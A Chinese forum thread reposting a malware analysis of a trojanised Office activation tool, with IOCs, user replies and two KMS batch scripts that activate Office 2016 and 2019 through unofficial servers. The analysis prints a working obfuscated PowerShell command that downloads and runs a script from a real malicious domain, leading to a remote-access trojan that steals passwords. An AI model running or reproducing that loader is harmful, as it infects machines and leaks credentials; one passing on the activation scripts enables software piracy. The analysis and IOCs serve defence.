无忧启动论坛

 找回密码
 注册
搜索
WEPE笔记本电脑手机维修小包 IT发烧友的必备工具最纯净的「微PE装机优盘」UEPON大师作品系统gho:最纯净好用系统下载站
查看: 2352|回复: 9

[转贴] [转载] 警惕Office盗版激活工具中隐藏的远程控制木马【搬运】

[复制链接]
发表于 2019-4-9 11:37:46 | 显示全部楼层 |阅读模式
本帖最后由 有阴也有阳 于 2019-4-9 19:47 编辑

          转贴原因:我的一篇讲述如何在Win7系统里面安装Office  2019的帖子里就是用OInstall.exe安装的,在Win7旗舰版里安装的Office  2019也是用OInstall.exe

自带的激活工具激活的,故此本着对读者负责的精神觉得有必要转贴,从吾爱破解论坛搬运而来,原帖地址:https://www.52pojie.cn/thread-924292-1-1.html

        转贴的正文:


概述
某讯御见威胁情报中心检测到一款Office激活工具被捆绑传播远程控制木马,该Office激活工具实际经过二次打包,黑客将恶意代码和正常的激活程序打包在资源文件中,当用户运行时,除了激活程序会运行,内置的Powershell恶意代码也会运行。该盗版激活工具会在后台下载远程控制木马运行,木马会搜集敏感信息上传并对电脑进行远程控制。


黑客将Powershell脚本代码(lnk文件)和真正的激活工具程序同时藏在资源文件中,生成新的“激活工具”,目标用户运行被重新打包的激活程序时,执行恶意脚本代码的lnk文件被释放运行。

资源文件
资源文件中包含的lnk文件信息


激活工具运行时从资源文件中释放lnk文件:


Lnk文件执行恶意Powershell脚本代码:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $wM=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal t $wM;$nXR=((New-Object Net.WebClient)).DownloadString('http://boundertime.ru/pps.ps1');t $nXR

Lnk指向的代码下载执行Powershell脚本:
hxxp://timebound.ug/pps.ps1(或http://boundertime.ru/pps.ps1)


Powershell脚本运行时,通过FromBase64String解码出PE文件二进制数据,并写入文件C:\Users\Public\xxxx.exe,然后将其作为参数传给Process.start
启动程序


远程控制木马
下载的C:\Users\Public\xxxx.exe为远程控制木马,会搜集浏览器、邮箱、Skype、Telegram、Steam等软件的登录密码上传至C2地址,并接收执行返回的指令,对目标电脑进行远程控制。


发送搜集的数据至C2地址hxxp://ghjgfjhjgf.ru/index.php


安全建议
1、使用正版软件,尽量不要使用激活、破解工具。
2、不要运行来历不明的程序。
3、使用电XX家拦截该类木马攻击。

IOCs

MD5
2fc6dd175a2288a9c2bed36969e3241d
0c638e0c02e0d1c2a2eb7429a51e13b0
a5898f7aae5d6212fac6447bf801ecc1
eb5b534366f0831b3842abac17346cd5
171a6a149d36d8be2f9d4b35c25a8ec4
03a1845d78da4d5d40ffa6cb3892ce0c
ca21c7ae0664b9b5dc24710b0221d4f4
006f03b07fe27eaf4ab4a866a02dc5dd
d343f4179b00f1f3b2ab7b942648b0c2
10e7859d0dfabae2eebc9605e40612f2
05861babd099e81990cfda340de5de01
4e5b4bc27cad9891c1d11ff6ee1b3581
82b313ceef47bf9aa18e3e0946fca773

IP
92.53.120.114
31.177.78.16

Domain
boundertime.ru
timebound.ug
ghjgfjhjgf.ru

URL
hxxp://timebound.ug/pps.ps1
hxxp://boundertime.ru/pps.ps1
hxxp://ghjgfjhjgf.ru/index.php

动动小手,免费评分走一波

我自己用的这个还可以吧
论坛内也有好多的
链接:https://pan.baidu.com/s/1uncSk4EsUzbputHIIZ5b-w 密码:2mz0
没看版本是啥


论坛里有最新发布的,应该比我的新一点
https://www.52pojie.cn/thread-915743-1-1.html


        转贴者再推荐一款Office  2019的激活软件:http://bbs.wuyou.net/forum.php?m ... d=413914&extra=
发表于 2019-4-9 14:02:40 | 显示全部楼层
激活工具只用大家认可的哦
回复

使用道具 举报

发表于 2019-4-9 14:50:09 | 显示全部楼层
完了,我的系统功能里关闭powershell,会不会被黑客上门来臭骂?
回复

使用道具 举报

发表于 2019-4-9 23:03:24 | 显示全部楼层
本帖最后由 zhhww57 于 2019-4-9 23:11 编辑

https://whois.aizhan.com/ghjgfjhjgf.ru/
再贴一个爱站查询的域名结果
1月份创建的?
指向89.223.88.128,俄罗斯的一个ip?
我访问不通

这些里面都有提到:
https://www.52pojie.cn/thread-924292-1-1.html
https://guanjia.qq.com/news/n3/2500.html
https://otx.alienvault.com/pulse/5ca502c62984cc01d75dd25d
google查询了一下
回复

使用道具 举报

发表于 2019-4-9 23:50:02 | 显示全部楼层
借帖分享个激活工具,了解的可以自己看看:
MS-Office 2016:
  1. @echo off
  2. ::获取管理员身份
  3. set "_FilePath=%~f0"
  4. set "_FileDir=%~dp0"
  5. setlocal EnableExtensions EnableDelayedExpansion
  6. fltmc >nul 2>&1 || (
  7.     echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\GetAdmin.vbs"
  8.     echo UAC.ShellExecute "!_FilePath!", "", "", "runas", 1 >> "%temp%\GetAdmin.vbs"
  9.     "%temp%\GetAdmin.vbs"
  10.     del /f /q "%temp%\GetAdmin.vbs" >nul 2>&1
  11.     exit
  12. )
  13. pushd "!_FileDir!"

  14. ::修改下面的内容,定义选择想使用的KMS服务器。如果定义了多次,最后的有效

  15. ::set KMS_Sev=192.168.2.8
  16. ::set KMS_Sev=1.2.7.0
  17. set KMS_Sev=kms.lotro.cc
  18. ::set KMS_Sev=54.223.212.31
  19. ::set KMS_Sev=kms.guowaifuli.com
  20. ::set KMS_Sev=mhd.kmdns.net
  21. ::set KMS_Sev=xykz.f3322.org
  22. ::set KMS_Sev=106.186.25.239
  23. ::set KMS_Sev=110.noip.me
  24. ::set KMS_Sev=3rss.vicp.net:20439
  25. ::set KMS_Sev=45.78.3.223
  26. ::set KMS_Sev=kms.chinancce.com
  27. ::set KMS_Sev=kms.didichuxing.com
  28. ::set KMS_Sev=skms.ddns.net
  29. ::set KMS_Sev=zh.us.to
  30. ::set KMS_Sev=franklv.ddns.net
  31. ::set KMS_Sev=k.zpale.com
  32. ::set KMS_Sev=m.zpale.com
  33. ::set KMS_Sev=mvg.zpale.com
  34. ::set KMS_Sev=122.226.152.230
  35. ::set KMS_Sev=222.76.251.188
  36. ::set KMS_Sev=annychen.pw
  37. ::set KMS_Sev=heu168.6655.la
  38. ::set KMS_Sev=kms.aglc.cc
  39. ::set KMS_Sev=kms.landiannews.com
  40. ::set KMS_Sev=kms.shuax.com
  41. ::set KMS_Sev=kms.xspace.in
  42. ::set KMS_Sev=winkms.tk
  43. ::set KMS_Sev=wrlong.com

  44. ::======================= 以下内容无需更改 ======================
  45. setlocal EnableDelayedExpansion&color 3e & cd /d "%~dp0"
  46. title KMS_Activation_for_Office2016 - [hnfeng]

  47. ::从注册表获取安装路径
  48. for /f "tokens=2*" %%a in ('"reg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2^>nul') do (
  49.     set "_msi16=%%b"
  50. )
  51. for /f "tokens=2*" %%a in ('"reg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2^>nul') do (
  52.     set "_msi16wow=%%b"
  53. )
  54. for /f "tokens=2*" %%a in ('"reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2^>nul') do (
  55.     set "_ctr16=%%b\Office16"
  56. )

  57. ::验证路径是否正确,是则进行跳转,否则提示未找到安装目录
  58. if exist "%_msi16%\OSPP.VBS" (
  59.     cd /d %_msi16%
  60. ) else if exist "%_msi16wow%\OSPP.VBS" (
  61.     cd /d %_msi16wow%
  62. ) else if exist "%_ctr16%\OSPP.VBS" (
  63.     cd /d %_ctr16%
  64. ) else if exist "%ProgramFiles%\Microsoft Office\Office16\ospp.vbs" (
  65.     cd /d "%ProgramFiles%\Microsoft Office\Office16"
  66. ) else if exist "%ProgramFiles(x86)%\Microsoft Office\Office16\ospp.vbs" (
  67.     cd /d "%ProgramFiles(x86)%\Microsoft Office\Office16"
  68. ) else (
  69. echo.未找到 Microsoft Office 2016
  70. echo.请按任意键退出。。。
  71. pause>nul
  72. )

  73. echo 正在安装 KMS 许可证...
  74. for /f %%x in ('dir /b ..\root\Licenses16\project???vl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  75. for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  76. for /f %%x in ('dir /b ..\root\Licenses16\standardvl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  77. for /f %%x in ('dir /b ..\root\Licenses16\visio???vl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul

  78. echo 正在安装 MAK 许可证...
  79. for /f %%x in ('dir /b ..\root\Licenses16\project???vl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  80. for /f %%x in ('dir /b ..\root\Licenses16\proplusvl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  81. for /f %%x in ('dir /b ..\root\Licenses16\standardvl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  82. for /f %%x in ('dir /b ..\root\Licenses16\visio???vl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul

  83. echo 正在导入 KMS GVLK...
  84. cscript ospp.vbs /inpkey:NYH39-6GMXT-T39D4-WVXY2-D69YY >nul
  85. cscript ospp.vbs /inpkey:7WHWN-4T7MP-G96JF-G33KR-W8GF4 >nul
  86. cscript ospp.vbs /inpkey:RBWW7-NTJD4-FFK2C-TDJ7V-4C2QP >nul
  87. cscript ospp.vbs /inpkey:XQNVK-8JYDB-WJ9W3-YJ8YR-WFG99 >nul
  88. cscript ospp.vbs /inpkey:YG9NW-3K39V-2T3HJ-93F3Q-G83KT >nul
  89. cscript ospp.vbs /inpkey:PD3PC-RHNGV-FXJ29-8JK7D-RJRJK >nul

  90. echo 正在尝试 KMS 激活...
  91. cscript //nologo ospp.vbs /sethst:%KMS_Sev% >nul
  92. cscript //nologo ospp.vbs /act | find /i "successful" && (
  93.         echo.&echo ***** Office2016 激活成功 ***** & echo.) || (echo.&echo ***** Office2016 激活失败 ***** & echo.
  94.         echo 请检查网络是否畅通,以及选择修改其他的 KMS 服务器后再试)
  95. pause
复制代码

2019:
  1. @echo off
  2. ::获取管理员身份
  3. set "_FilePath=%~f0"
  4. set "_FileDir=%~dp0"
  5. setlocal EnableExtensions EnableDelayedExpansion
  6. fltmc >nul 2>&1 || (
  7.     echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\GetAdmin.vbs"
  8.     echo UAC.ShellExecute "!_FilePath!", "", "", "runas", 1 >> "%temp%\GetAdmin.vbs"
  9.     "%temp%\GetAdmin.vbs"
  10.     del /f /q "%temp%\GetAdmin.vbs" >nul 2>&1
  11.     exit
  12. )
  13. pushd "!_FileDir!"

  14. ::修改下面的内容,定义选择想使用的KMS服务器。如果定义了多次,最后的有效

  15. ::set KMS_Sev=192.168.2.8
  16. ::set KMS_Sev=1.2.7.0
  17. set KMS_Sev=kms.lotro.cc
  18. ::set KMS_Sev=54.223.212.31
  19. ::set KMS_Sev=kms.guowaifuli.com
  20. ::set KMS_Sev=mhd.kmdns.net
  21. ::set KMS_Sev=xykz.f3322.org
  22. ::set KMS_Sev=106.186.25.239
  23. ::set KMS_Sev=110.noip.me
  24. ::set KMS_Sev=3rss.vicp.net:20439
  25. ::set KMS_Sev=45.78.3.223
  26. ::set KMS_Sev=kms.chinancce.com
  27. ::set KMS_Sev=kms.didichuxing.com
  28. ::set KMS_Sev=skms.ddns.net
  29. ::set KMS_Sev=zh.us.to
  30. ::set KMS_Sev=franklv.ddns.net
  31. ::set KMS_Sev=k.zpale.com
  32. ::set KMS_Sev=m.zpale.com
  33. ::set KMS_Sev=mvg.zpale.com
  34. ::set KMS_Sev=122.226.152.230
  35. ::set KMS_Sev=222.76.251.188
  36. ::set KMS_Sev=annychen.pw
  37. ::set KMS_Sev=heu168.6655.la
  38. ::set KMS_Sev=kms.aglc.cc
  39. ::set KMS_Sev=kms.landiannews.com
  40. ::set KMS_Sev=kms.shuax.com
  41. ::set KMS_Sev=kms.xspace.in
  42. ::set KMS_Sev=winkms.tk
  43. ::set KMS_Sev=wrlong.com

  44. ::======================= 以下内容无需更改 ======================
  45. setlocal EnableDelayedExpansion&color 3e & cd /d "%~dp0"
  46. title KMS_Activation_for_Office2016 - [hnfeng]

  47. ::从注册表获取安装路径
  48. for /f "tokens=2*" %%a in ('"reg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2^>nul') do (
  49.     set "_msi16=%%b"
  50. )
  51. for /f "tokens=2*" %%a in ('"reg query HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2^>nul') do (
  52.     set "_msi16wow=%%b"
  53. )
  54. for /f "tokens=2*" %%a in ('"reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2^>nul') do (
  55.     set "_ctr16=%%b\Office16"
  56. )

  57. ::验证路径是否正确,是则进行跳转,否则提示未找到安装目录
  58. if exist "%_msi16%\OSPP.VBS" (
  59.     cd /d %_msi16%
  60. ) else if exist "%_msi16wow%\OSPP.VBS" (
  61.     cd /d %_msi16wow%
  62. ) else if exist "%_ctr16%\OSPP.VBS" (
  63.     cd /d %_ctr16%
  64. ) else if exist "%ProgramFiles%\Microsoft Office\Office16\ospp.vbs" (
  65.     cd /d "%ProgramFiles%\Microsoft Office\Office16"
  66. ) else if exist "%ProgramFiles(x86)%\Microsoft Office\Office16\ospp.vbs" (
  67.     cd /d "%ProgramFiles(x86)%\Microsoft Office\Office16"
  68. ) else (
  69. echo.未找到 Microsoft Office 2016
  70. echo.请按任意键退出。。。
  71. pause>nul
  72. )

  73. echo 正在安装 KMS 许可证...
  74. for /f %%x in ('dir /b ..\root\Licenses16\project???2019vl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  75. for /f %%x in ('dir /b ..\root\Licenses16\proplus2019vl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  76. for /f %%x in ('dir /b ..\root\Licenses16\standard2019vl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  77. for /f %%x in ('dir /b ..\root\Licenses16\visio???2019vl_kms*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul

  78. echo 正在安装 MAK 许可证...
  79. for /f %%x in ('dir /b ..\root\Licenses16\project???2019vl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  80. for /f %%x in ('dir /b ..\root\Licenses16\proplus2019vl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  81. for /f %%x in ('dir /b ..\root\Licenses16\standard2019vl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul
  82. for /f %%x in ('dir /b ..\root\Licenses16\visio???2019vl_mak*.xrm-ms') do cscript ospp.vbs /inslic:"..\root\Licenses16\%%x" >nul

  83. echo 正在导入 KMS GVLK...
  84. cscript ospp.vbs /inpkey:NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP >nul
  85. cscript ospp.vbs /inpkey:6NWWJ-YQWMR-QKGCB-6TMB3-9D9HK >nul
  86. cscript ospp.vbs /inpkey:B4NPR-3FKK7-T2MBV-FRQ4W-PKD2B >nul
  87. cscript ospp.vbs /inpkey:C4F7P-NCP8C-6CQPT-MQHV9-JXD2M >nul
  88. cscript ospp.vbs /inpkey:9BGNQ-K37YR-RQHF2-38RQ3-7VCBB >nul
  89. cscript ospp.vbs /inpkey:7TQNQ-K3YQQ-3PFH7-CCPPM-X4VQ2 >nul

  90. echo 正在尝试 KMS 激活...
  91. cscript //nologo ospp.vbs /sethst:%KMS_Sev% >nul
  92. cscript //nologo ospp.vbs /act | find /i "successful" && (
  93.         echo.&echo ***** Office2016 激活成功 ***** & echo.) || (echo.&echo ***** Office2016 激活失败 ***** & echo.
  94.         echo 请检查网络是否畅通,以及选择修改其他的 KMS 服务器后再试)
  95. pause
复制代码


修改自远景大神 hnfeng 的作品【只为激活Office2016标准版/专业增强版(零售、VL)的批处理】
回复

使用道具 举报

发表于 2019-4-10 09:10:03 | 显示全部楼层
谢谢分享,吓得我赶紧检查我收藏的版本
回复

使用道具 举报

发表于 2019-4-10 10:48:44 | 显示全部楼层
谢谢分享
赶紧检查
回复

使用道具 举报

发表于 2019-4-11 20:21:24 | 显示全部楼层
把这几个地址加进hosts,过滤掉。
回复

使用道具 举报

发表于 2019-10-30 00:27:43 | 显示全部楼层
看起来真是可怕,谢谢提醒,是要多加注意
回复

使用道具 举报

发表于 2019-10-30 05:03:39 | 显示全部楼层
其实我用了很久的OFFICE 2013-2019 C2R工具进行下载和安装,因我对OFFICE有双语要求,官方版不能满足。包括激活在内,都是用这个工具,不过下载渠道是WWW.DAYANZAI.ME或官网。没发现什么异常。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|Archiver|捐助支持|无忧启动 ( 闽ICP备05002490号-1 )

闽公网安备 35020302032614号

GMT+8, 2019-12-12 20:16

Powered by Discuz! X3.3

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表